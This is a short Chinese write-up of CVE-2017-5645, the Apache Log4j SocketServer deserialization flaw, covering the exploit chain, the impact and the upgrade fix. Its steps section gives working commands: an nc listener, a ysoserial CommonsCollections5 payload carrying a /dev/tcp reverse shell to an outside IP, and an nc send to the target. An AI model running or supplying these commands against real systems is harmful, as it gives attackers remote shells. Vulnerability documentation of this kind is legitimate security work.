news 2026/6/15 15:23:09

CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

CVSS评分:9.8(严重)

CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

  • 1. 漏洞原理
  • 2. 漏洞危害
  • 3. 漏洞修复

1. 漏洞原理

Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。Apache Log4j 2.8.2之前的2.x版本中存在代码问题漏洞。攻击者可利用该漏洞执行任意代码。

漏洞利用链:

攻击者 ↓ TCP / UDP 发送恶意序列化对象 ↓ Log4j SocketServer ↓ ObjectInputStream.readObject() ↓ Gadget chain ↓ 任意代码执行

攻击者需要满足条件:

  • 目标服务器开启并监听 Log4j Socket Server(TCP 或 UDP)端口
  • 可以向服务器发送任意数据包

具体利用路径概括如下:

  1. 攻击者构造特制的 Java 序列化对象字节流,包含恶意链
  2. 通过网络向 Log4j 的 socket 端口发送该 payload
  3. Log4j 接收到数据后反序列化该对象
  4. 恶意对象触发执行攻击者指定的系统命令

step:

1、nc 监听本地

https://www.revshells.com/

nc-lvnp9001

2、生成恶意payload

java -jar ysoserial.jar CommonsCollections5"sh -i >& /dev/tcp/172.30.22.210/9001 0>&1">payload.bin

3、发送,反弹shell

nc172.xxx.xxx.xxx5007<payload.bin

2. 漏洞危害

微步标记为高风险,重点两高一弱漏洞:

该漏洞可导致直接RCE,尽快修复

3. 漏洞修复

  • 升级到Apache Log4j 2.8.2 或以上版本
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/15 15:02:25

jsp二手奢侈品交易网站5uy1c(程序+源码+数据库+调试部署+开发环境)

本系统&#xff08;程序源码数据库调试部署开发环境&#xff09;带论文文档1万字以上&#xff0c;文末可获取&#xff0c;系统界面在最后面。 系统程序文件列表 用户,卖家,专卖店,商品分类,商品信息,养护预约,预约鉴定,售后服务 开题报告内容 一、研究背景 随着社会经济的发…

作者头像 李华
网站建设 2026/6/15 13:39:04

看完就会:8个AI论文软件测评!本科生写论文+开题报告全攻略

对于高校学生&#xff0c;尤其是本科生而言&#xff0c;撰写论文和开题报告是学习生涯中的一项重要任务&#xff0c;但往往面临时间紧张、思路混乱、格式不规范等多重挑战。随着AI技术的不断进步&#xff0c;越来越多的论文辅助工具应运而生&#xff0c;如何选择一款真正适合自…

作者头像 李华
网站建设 2026/6/15 12:24:12

格式化输入输出:控制输出精度与对齐方式

格式化输入输出&#xff1a;控制输出精度与对齐方式 在前文《C 输入输出流&#xff1a;cin 与 cout 的基础用法》中&#xff0c;我们掌握了cin接收输入、cout输出内容的核心逻辑——用cin获取用户输入的数据&#xff0c;用cout将结果打印到屏幕&#xff0c;满足了简单的交互与…

作者头像 李华
网站建设 2026/6/15 12:24:33

工程建筑中,SpringBoot如何实现百M大文件的分片上传与合并?

大文件传输解决方案 作为福建农业集团的项目负责人&#xff0c;我理解您面临的是一个具有挑战性的大文件传输需求&#xff0c;涉及国家安全级别的高要求。基于您提供的详细需求&#xff0c;我将从技术架构、解决方案和源代码示例三个方面为您提供专业建议。 一、需求分析与技…

作者头像 李华